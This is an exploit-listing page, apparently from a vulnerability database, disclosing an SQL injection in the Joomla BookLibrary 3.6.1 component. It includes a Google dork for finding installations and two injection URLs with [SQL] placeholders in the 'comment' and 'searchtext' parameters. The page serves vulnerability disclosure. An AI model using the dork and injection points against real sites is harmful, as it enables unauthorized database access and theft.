header-logo
Suggest Exploit
vendor:
BookLibrary
by:
Ihsan Sencan
7,5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: BookLibrary
Affected Version From: 3.6.1
Affected Version To: 3.6.1
Patch Exists: NO
Related CWE: N/A
CPE: a:ordasoft:booklibrary:3.6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Win7 x64, Kali Linux x64
2017

Joomla! Component BookLibrary v3.6.1 – SQL Injection

A SQL injection vulnerability exists in Joomla! Component BookLibrary v3.6.1. An attacker can send malicious SQL queries to the application by manipulating the 'comment' and 'searchtext' parameters in the 'index.php' and 'search' scripts, respectively.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

# # # # # 
# Exploit Title: Joomla! Component BookLibrary v3.6.1 - SQL Injection
# Google Dork: inurl:index.php?option=com_booklibrary
# Date: 22.02.2017
# Vendor Homepage: http://ordasoft.com/
# Software Buy: https://extensions.joomla.org/extensions/extension/living/education-a-culture/booklibrary-basic/
# Demo: http://ordasvit.com/joomla-book-library
# Version: 3.6.1
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php?option=com_booklibrary&task=suggestion&comment=[SQL]
# http://localhost/[PATH]/index.php/component/booklibrary/0/search?searchtext=[SQL]&author=on&title=on&isbn=on'&bookid=on&description=on&publisher=on&pricefrom=19&priceto=287.9&catid=0&option=com_booklibrary&task=search&Itemid=207
# # # # #

Navigation

Suggest Exploit

Services By CQR